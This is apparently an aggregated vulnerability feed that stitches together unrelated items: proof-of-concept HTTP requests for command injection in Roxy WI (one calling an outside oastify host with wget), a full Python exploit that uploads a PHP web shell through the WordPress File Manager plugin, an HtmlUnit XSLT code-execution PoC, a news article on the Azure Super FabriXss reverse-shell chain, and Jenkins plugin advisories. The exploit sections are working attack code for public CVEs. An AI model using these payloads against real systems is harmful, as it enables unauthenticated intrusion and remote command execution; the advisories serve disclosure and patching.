Roxy WI version 6.1.1.0 suffers from an unauthenticated remote code execution vulnerability.

    # ADVISORY INFORMATION# Exploit Title: Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload# Date of found: 21 July 2022# Application: Roxy WI <= v6.1.1.0# Author: Nuri Çilengir # Vendor Homepage: https://roxy-wi.org# Software Link: https://github.com/hap-wi/roxy-wi.git# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137# Tested on: Ubuntu 22.04# CVE : CVE-2022-31161# PoCPOST /app/options.py HTTP/1.1Host: 192.168.56.116User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 123Origin: https://192.168.56.116Referer: https://192.168.56.116/app/login.pyConnection: closeshow_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20wget%20<id>.oastify.com;

Roxy WI 6.1.1.0 Remote Code Execution

Roxy WI version 6.1.0.0 suffers from an unauthenticated remote code execution vulnerability.

    # ADVISORY INFORMATION# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)# Date of found: 21 July 2022# Application: Roxy WI <= v6.1.0.0# Author: Nuri Çilengir # Vendor Homepage: https://roxy-wi.org# Software Link: https://github.com/hap-wi/roxy-wi.git# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137# Tested on: Ubuntu 22.04# CVE : CVE-2022-31126# PoCPOST /app/options.py HTTP/1.1Host: 192.168.56.116User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 73Origin: https://192.168.56.116Referer: https://192.168.56.116/app/login.pyConnection: closeshow_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcert=;id;

Roxy WI 6.1.0.0 Remote Code Execution

WordPress File Manager plugin versions 6.0 through 6.9 suffer from a remote shell upload vulnerability.

    #!/usr/bin/env# Exploit Title: WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE# Date: [ 22-01-2023 ]# Exploit Author: [BLY]# Vendor Homepage: [https://wpscan.com/vulnerability/10389]# Version: [ File Manager plugin 6.0-6.9]# Tested on: [ Debian ]# CVE : [ CVE-2020-25213 ]import sys,signal,time,requestsfrom bs4 import BeautifulSoup#from pprint import pprintdef handler(sig,frame):  print ("[!]Saliendo")  sys.exit(1)signal.signal(signal.SIGINT,handler)def commandexec(command):  exec_url = url+"/wp-content/plugins/wp-file-manager/lib/php/../files/shell.php"  params = {    "cmd":command  }  r=requests.get(exec_url,params=params)  soup = BeautifulSoup(r.text, 'html.parser')  text = soup.get_text()  print (text)def exploit():  global url  url = sys.argv[1]  command = sys.argv[2]  upload_url = url+"/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"  headers = {      'content-type': "multipart/form-data; boundary=----WebKitFormBoundaryvToPIGAB0m9SB1Ww",      'Connection': "close"   }  payload = "------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php echo \"<pre>\" . shell_exec($_REQUEST['cmd']) . \"</pre>\"; ?>\r\n------WebKitFormBoundaryvToPIGAB0m9SB1Ww--"  try:    r=requests.post(upload_url,data=payload,headers=headers)    #pprint(r.json())    commandexec(command)  except:    print("[!] Algo ha salido mal...")def help():  print ("\n[*] Uso: python3",sys.argv[0],"\"url\" \"comando\"")  print ("[!] Ejemplo: python3",sys.argv[0],"http://wordpress.local/ id")if __name__ == '__main__':  if len(sys.argv) != 3:    help()  else:    exploit()

WordPress File Manager 6.9 Shell Upload

Categories: Exploits and vulnerabilities
Categories: News
Tags: Azure

Tags:  Microsoft

Tags:  Super FabriXss

Tags:  RCE

Tags:  vulnerability

Tags:  CVE-2023-23383

Researchers disclosed how they found a remote code execution vulnerability in Azure Service Fabric Explorer.



(Read more...)




The post Super FabriXss: an RCE vulnerability in Azure Service Fabric Explorer appeared first on Malwarebytes Labs.

Researchers at Orca Security disclosed how they found a remote code execution vulnerability in Azure Service Fabric Explorer.

The vulnerability was reported to the Microsoft Security Response Center (MSRC) with responsible disclosure and was included by Microsoft in their March 2023 Patch Tuesday round. The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. This newly-discovered vulnerability is listed as CVE-2023-23383 with a CVSS score of 8.2 out of 10.

This vulnerability was dubbed Super FabriXss and it’s a vulnerability that exists on Azure Service Fabric Explorer version 9.1.1436.9590 and earlier.

The researcher’s story is interesting as it shows that it is possible to find new Cross-Site Scripting (XSS) vulnerabilities in weathered and complex systems like Azure. And it’s frightening because the Super FabriXss vulnerability enables remote attackers to leverage an XSS vulnerability to achieve remote code execution on a container hosted on a Service Fabric node without the need for authentication.

Azure Service Fabric Explorer (SFX) is an open-source tool for inspecting and managing Azure Service Fabric clusters. A Service Fabric cluster is a network-connected collection of virtual or physical computers where your microservices are deployed and managed. A cluster can have thousands of nodes.

An XSS vulnerability is a flaw in a web application that allows an attacker to inject code, (usually HTML or JavaScript) into the contents of a website. As a possible consequence, a visitor of that website will execute that code in his browser and it will be treated (read: trusted) as if it originated from the site they visited. By exploiting this, the attacker can bypass the browser’s same origin policy and is able to steal private information from a victim associated with the website. Depending on the site, it allows the attacker to masquerade as a victim visitor, and carry out any actions that the user is able to perform, and to access any of the user's data.

What the researchers found after some testing is that when the Node name is modified in the SFX UI, it is reflected in the Node’s independent dashboard. So they set out to try some different names to observe how the server handles non-existent and/or modified values for different variables.

By trying some simple HTML code like a H1 tag that is often used to display the main topic on a web page in a larger font size, they found that clicking on Cluster in the options on the Events tab resulted in a new title being displayed as a large title, due to the effect of the <h1> tag.

_Image courtesy of Orca Security_

While this is no serious attack, it shows that there are ways to circumvent the input sanitation that takes place, or should take place and it might be possible to inject more complex HTML code.

How can we use this in a full-fletched attack?

For a full analysis, feel free to ready the blog by the researchers which goes into more detail. But, roughly, the attack would work like this:

The attacker sends a crafted URL to the Service Fabric Administrator. This URL includes an iframe that uses a simple fetch request to trigger an upgrade of a Compose deployment. The upgrade process overwrites the existing deployment with a new, malicious one. This new deployment includes a CMD instruction in its Dockerfile that will download a remote .bat file.

The .bat file retrieves a second file that contains an encoded reverse shell. This reverse shell allows the attacker to gain remote access to the target system and potentially take control of the cluster node where the container is hosted. By taking control of a legitimate application in this way, the attacker can then use it as a platform to launch further attacks or gain access to sensitive data or resources.

**Update**

If you have automatic updates enabled, no action is needed. However, for those who choose to manually update and you are on version 9.1.1436.9590 or earlier, please refer to Manage Service Fabric cluster upgrades for instructions on how to update your Service Fabric Cluster.

**We don’t just report on vulnerabilities—we identify them, and prioritize action.**

Cybersecurity risks should never spread beyond a headline. Keep vulnerabilities in tow by using Malwarebytes Vulnerability and Patch Management.

Super FabriXss: an RCE vulnerability in Azure Service Fabric Explorer

Versions of the package net.sourceforge.htmlunit:htmlunit from 0 and before 3.0.0 are vulnerable to Remote Code Execution (RCE) via XSTL, when browsing the attacker’s webpage.

HtmlUnit-RCE

2022-12-30 10:10:12 #WEB

**「漏洞已經上報，最新版本已經修復 文章更新於23.1.26」**

HtmlUnit 适用于java的无头浏览器，我其实觉得不算无头浏览器吧更像爬虫，最新版本也可以做到浏览攻击者网页触发RCE

先简单放个图，后面来补

其实真的蛮简单的就不分析了，我那天只是偶尔看了下就找到了，不过最近xslt好像比较火来着呢

Test.java

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  

package HtmlUnit;  
  
import com.gargoylesoftware.htmlunit.WebClient;  
import com.gargoylesoftware.htmlunit.html.HtmlPage;  
  
public class Test {  
  
    public static void main(String\[\] args) throws Exception {  
  
        try (final WebClient webClient \= new WebClient()) {  
              
              
  
            final HtmlPage page \= webClient.getPage("http://xxx/htmlunit.html");  
        }  
    }  
}  

htmlunit.html

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  
11  
12  
13  
14  
15  
16  
17  
18  
19  
20  
21  
22  
23  
24  
25  

<script\>  
    function createXmlDocument() {  
        return document.implementation.createDocument('', '', null);  
    }  
    function  loadXMLDocumentFromFile(file) {  
        xhttp = new XMLHttpRequest();  
        xhttp.open("GET", file, false);  
        xhttp.send();  
        return xhttp.responseXML;  
    }  
    console.log("1");  
  
    var xmlDoc = createXmlDocument();  
    xmlDoc.async = false;  
    xmlDoc = loadXMLDocumentFromFile("1.xml");  
      
  
    var xslDoc = createXmlDocument();  
    xslDoc.async = false;  
    xslDoc = loadXMLDocumentFromFile("2.xml");  
  
    var processor = new XSLTProcessor();  
    processor.importStylesheet(xslDoc);  
    processor.transformToDocument(xmlDoc);  
</script\>  

1.xml

1  
2  

<?xml version="1.0" encoding="UTF-8"?>  
<s\></s\>  

2.xml

1  
2  
3  
4  
5  
6  
7  
8  

<xsl:stylesheet version\="1.0" xmlns:xsl\="http://www.w3.org/1999/XSL/Transform" xmlns:rt\="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob\="http://xml.apache.org/xalan/java/java.lang.Object"\>  
   <xsl:template match\="/"\>  
     <xsl:variable name\="rtobject" select\="rt:getRuntime()"/>  
     <xsl:variable name\="process" select\="rt:exec($rtobject,'calc')"/>  
     <xsl:variable name\="processString" select\="ob:toString($process)"/>  
     <xsl:value-of select\="$processString"/>  
   </xsl:template\>  
 </xsl:stylesheet\>  

**廢話收容所**

我平常真的太懶了，平常如果不是要打CTF，基本上不自己主動學習，希望來年2023好好記錄博客督促自己

大三上學期基本上結束了，發現自己并沒有達到我所期望的水平，每天基本上就是什麽都沒幹就過去了，畢竟這一學期我大概是沒去學校上課，想著好好學習技術，結果高估自己了lmao

CVE-2023-26119: HtmlUnit-RCE | Siebene@ Blog

Jenkins Cppcheck Plugin 1.26 and earlier does not escape file names from Cppcheck report files before showing them on the Jenkins UI, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control report file contents.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   AbsInt a³ Plugin
*   Convert To Pipeline Plugin
*   Cppcheck Plugin
*   Crap4J Plugin
*   JaCoCo Plugin
*   Mashup Portlets Plugin
*   OctoPerf Load Testing Plugin Plugin
*   OctoPerf Load Testing Plugin Plugin
*   OctoPerf Load Testing Plugin Plugin
*   Performance Publisher Plugin
*   Phabricator Differential Plugin
*   Pipeline Aggregator View Plugin
*   remote-jobs-view-plugin Plugin
*   Role-based Authorization Strategy Plugin
*   Visual Studio Code Metrics Plugin

**Descriptions****Incorrect permission checks in Role-based Authorization Strategy Plugin**

**SECURITY-3053 / CVE-2023-28668**  
**Severity (CVSS):** Medium  
**Affected plugin: role-strategy**  
**Description:**

Permissions in Jenkins can be enabled and disabled. Some permissions are disabled by default, e.g., Overall/Manage or Item/Extended Read. Disabled permissions cannot be granted directly, only through greater permissions that imply them (e.g., Overall/Administer or Item/Configure).

Role-based Authorization Strategy Plugin 587.v2872c41fa\_e51 and earlier grants permissions even after they’ve been disabled.

This allows attackers to have greater access than they’re entitled to after the following operations took place:

1.  A permission is granted to attackers directly or through groups.
    
2.  The permission is disabled, e.g., through the script console.
    

Role-based Authorization Strategy Plugin 587.588.v850a\_20a\_30162 does not grant disabled permissions.

**Stored XSS vulnerability in JaCoCo Plugin**

**SECURITY-3061 / CVE-2023-28669**  
**Severity (CVSS):** High  
**Affected plugin: jacoco**  
**Description:**

JaCoCo Plugin 3.3.2 and earlier does not escape class and method names shown on the UI.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control input files for the 'Record JaCoCo coverage report' post-build action.

JaCoCo Plugin 3.3.2.1 escapes class and method names shown on the UI.

**Stored XSS vulnerability in Pipeline Aggregator View Plugin**

**SECURITY-2885 / CVE-2023-28670**  
**Severity (CVSS):** High  
**Affected plugin: pipeline-aggregator-view**  
**Description:**

Pipeline Aggregator View Plugin 1.13 and earlier does not escape a variable representing the current view’s URL in inline JavaScript.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by authenticated attackers with Overall/Read permission.

Pipeline Aggregator View Plugin 1.14 obtains the current URL in a way not susceptible to XSS.

**CSRF vulnerability in OctoPerf Load Testing Plugin Plugin**

**SECURITY-3067 (1) / CVE-2023-28671**  
**Severity (CVSS):** Medium  
**Affected plugin: octoperf**  
**Description:**

OctoPerf Load Testing Plugin Plugin 4.5.0 and earlier does not require POST requests for a connection test HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

OctoPerf Load Testing Plugin Plugin 4.5.1 requires POST requests for the affected connection test HTTP endpoint.

**Missing permission check in OctoPerf Load Testing Plugin Plugin**

**SECURITY-3067 (2) / CVE-2023-28672**  
**Severity (CVSS):** High  
**Affected plugin: octoperf**  
**Description:**

OctoPerf Load Testing Plugin Plugin 4.5.1 and earlier does not perform a permission check in a connection test HTTP endpoint.

This allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

OctoPerf Load Testing Plugin Plugin 4.5.2 properly performs a permission check when accessing the affected connection test HTTP endpoint.

**Missing permission check in OctoPerf Load Testing Plugin Plugin allows enumerating credentials IDs**

**SECURITY-3067 (3) / CVE-2023-28673**  
**Severity (CVSS):** Medium  
**Affected plugin: octoperf**  
**Description:**

OctoPerf Load Testing Plugin Plugin 4.5.2 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in OctoPerf Load Testing Plugin Plugin 4.5.3 requires the appropriate permissions.

**CSRF vulnerability and missing permission checks in OctoPerf Load Testing Plugin Plugin**

**SECURITY-3067 (4) / CVE-2023-28674 (CSRF), CVE-2023-28675 (missing permission check)**  
**Severity (CVSS):** Medium  
**Affected plugin: octoperf**  
**Description:**

OctoPerf Load Testing Plugin Plugin 4.5.2 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to connect to a previously configured Octoperf server using attacker-specified credentials.

Additionally, these endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

OctoPerf Load Testing Plugin Plugin 4.5.3 requires POST requests and the appropriate permissions for the affected HTTP endpoints.

**CSRF vulnerability in Convert To Pipeline Plugin results in RCE**

**SECURITY-2963 / CVE-2023-28676**  
**Severity (CVSS):** High  
**Affected plugin: convert-to-pipeline**  
**Description:**

Convert To Pipeline Plugin 1.0 and earlier does not require POST requests for the HTTP endpoint converting a Freestyle project to Pipeline, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to create a Pipeline based on a Freestyle project. Combined with SECURITY-2966, this can result in the execution of unsandboxed Pipeline scripts.

**Command injection vulnerability in Convert To Pipeline Plugin results in RCE**

**SECURITY-2966 / CVE-2023-28677**  
**Severity (CVSS):** High  
**Affected plugin: convert-to-pipeline**  
**Description:**

Convert To Pipeline Plugin 1.0 and earlier uses basic string concatenation to convert Freestyle projects' Build Environment, Build Steps, and Post-build Actions to the equivalent Pipeline step invocations.

This allows attackers able to configure Freestyle projects to prepare a crafted configuration that injects Pipeline script code into the (unsandboxed) Pipeline resulting from a conversion by Convert To Pipeline Plugin. If an administrator converts the Freestyle project to a Pipeline, the script will be pre-approved.

**Stored XSS vulnerability in Cppcheck Plugin**

**SECURITY-2809 / CVE-2023-28678**  
**Severity (CVSS):** High  
**Affected plugin: cppcheck**  
**Description:**

Cppcheck Plugin 1.26 and earlier does not escape file names from Cppcheck report files before showing them on the Jenkins UI.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control report file contents.

**Stored XSS vulnerability in Mashup Portlets Plugin**

**SECURITY-2813 / CVE-2023-28679**  
**Severity (CVSS):** High  
**Affected plugin: mashup-portlets-plugin**  
**Description:**

Mashup Portlets Plugin 1.1.2 and earlier provides the "Generic JS Portlet" feature that lets a user populate a portlet using a custom JavaScript expression.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by authenticated attackers with Overall/Read permission.

**XXE vulnerability in Crap4J Plugin**

**SECURITY-2925 / CVE-2023-28680**  
**Severity (CVSS):** High  
**Affected plugin: crap4j**  
**Description:**

Crap4J Plugin 0.9 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control Crap Report file contents to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in Visual Studio Code Metrics Plugin**

**SECURITY-2926 / CVE-2023-28681**  
**Severity (CVSS):** High  
**Affected plugin: vs-code-metrics**  
**Description:**

Visual Studio Code Metrics Plugin 1.7 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control VS Code Metrics File contents to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in Performance Publisher Plugin**

**SECURITY-2928 / CVE-2023-28682**  
**Severity (CVSS):** High  
**Affected plugin: perfpublisher**  
**Description:**

Performance Publisher Plugin 8.09 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control PerfPublisher report files to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in Phabricator Differential Plugin**

**SECURITY-2942 / CVE-2023-28683**  
**Severity (CVSS):** High  
**Affected plugin: phabricator-plugin**  
**Description:**

Phabricator Differential Plugin 2.1.5 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control coverage report file contents for the 'Post to Phabricator' post-build action to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in remote-jobs-view-plugin Plugin**

**SECURITY-2956 / CVE-2023-28684**  
**Severity (CVSS):** High  
**Affected plugin: remote-jobs-view-plugin**  
**Description:**

remote-jobs-view-plugin Plugin 0.0.3 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows authenticated attackers with Overall/Read permission to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**XXE vulnerability in AbsInt a³ Plugin**

**SECURITY-2930 / CVE-2023-28685**  
**Severity (CVSS):** High  
**Affected plugin: absint-a3**  
**Description:**

AbsInt a³ Plugin 1.1.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control 'Project File (APX)' contents to have Jenkins parse a crafted XML document that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

**Severity**

*   SECURITY-2809: High
*   SECURITY-2813: High
*   SECURITY-2885: High
*   SECURITY-2925: High
*   SECURITY-2926: High
*   SECURITY-2928: High
*   SECURITY-2930: High
*   SECURITY-2942: High
*   SECURITY-2956: High
*   SECURITY-2963: High
*   SECURITY-2966: High
*   SECURITY-3053: Medium
*   SECURITY-3061: High
*   SECURITY-3067 (1): Medium
*   SECURITY-3067 (2): High
*   SECURITY-3067 (3): Medium
*   SECURITY-3067 (4): Medium

**Affected Versions**

*   **AbsInt a³ Plugin** up to and including 1.1.0
*   **Convert To Pipeline Plugin** up to and including 1.0
*   **Cppcheck Plugin** up to and including 1.26
*   **Crap4J Plugin** up to and including 0.9
*   **JaCoCo Plugin** up to and including 3.3.2
*   **Mashup Portlets Plugin** up to and including 1.1.2
*   **OctoPerf Load Testing Plugin Plugin** up to and including 4.5.0
*   **OctoPerf Load Testing Plugin Plugin** up to and including 4.5.1
*   **OctoPerf Load Testing Plugin Plugin** up to and including 4.5.2
*   **Performance Publisher Plugin** up to and including 8.09
*   **Phabricator Differential Plugin** up to and including 2.1.5
*   **Pipeline Aggregator View Plugin** up to and including 1.13
*   **remote-jobs-view-plugin Plugin** up to and including 0.0.3
*   **Role-based Authorization Strategy Plugin** up to and including 587.v2872c41fa\_e51
*   **Visual Studio Code Metrics Plugin** up to and including 1.7

**Fix**

*   **JaCoCo Plugin** should be updated to version 3.3.2.1
*   **OctoPerf Load Testing Plugin Plugin** should be updated to version 4.5.1
*   **OctoPerf Load Testing Plugin Plugin** should be updated to version 4.5.2
*   **OctoPerf Load Testing Plugin Plugin** should be updated to version 4.5.3
*   **Pipeline Aggregator View Plugin** should be updated to version 1.14
*   **Role-based Authorization Strategy Plugin** should be updated to version 587.588.v850a\_20a\_30162

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   AbsInt a³ Plugin
*   Convert To Pipeline Plugin
*   Cppcheck Plugin
*   Crap4J Plugin
*   Mashup Portlets Plugin
*   Performance Publisher Plugin
*   Phabricator Differential Plugin
*   remote-jobs-view-plugin Plugin
*   Visual Studio Code Metrics Plugin

Learn why we announce these issues.

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **CC Bomber, Kitri BoB** for SECURITY-2925, SECURITY-2926, SECURITY-2928, SECURITY-2930, SECURITY-2942, SECURITY-2963
*   **Daniel Beck, CloudBees, Inc. and Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2809
*   **Daniel Beck, CloudBees, Inc. and Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-3053
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2885, SECURITY-3061
*   **LaNyer640 & Crilwa** for SECURITY-2956
*   **Valdes Che Zogou, CloudBees, Inc.** for SECURITY-2813
*   **Yaroslav Afenkin, CloudBees, Inc.** for SECURITY-2966, SECURITY-3067 (1), SECURITY-3067 (2), SECURITY-3067 (3), SECURITY-3067 (4)

CVE-2023-28678: Jenkins Security Advisory 2023-03-21

Jenkins OctoPerf Load Testing Plugin Plugin 4.5.1 and earlier does not perform a permission check in a connection test HTTP endpoint, allowing attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

CVE-2023-28672: Jenkins Security Advisory 2023-03-21

Jenkins Phabricator Differential Plugin 2.1.5 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

CVE-2023-28683: Jenkins Security Advisory 2023-03-21

Jenkins Mashup Portlets Plugin 1.1.2 and earlier provides the "Generic JS Portlet" feature that lets a user populate a portlet using a custom JavaScript expression, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by authenticated attackers with Overall/Read permission.

CVE-2023-28679: Jenkins Security Advisory 2023-03-21

Jenkins Role-based Authorization Strategy Plugin 587.v2872c41fa_e51 and earlier grants permissions even after they've been disabled.

Tag

#rce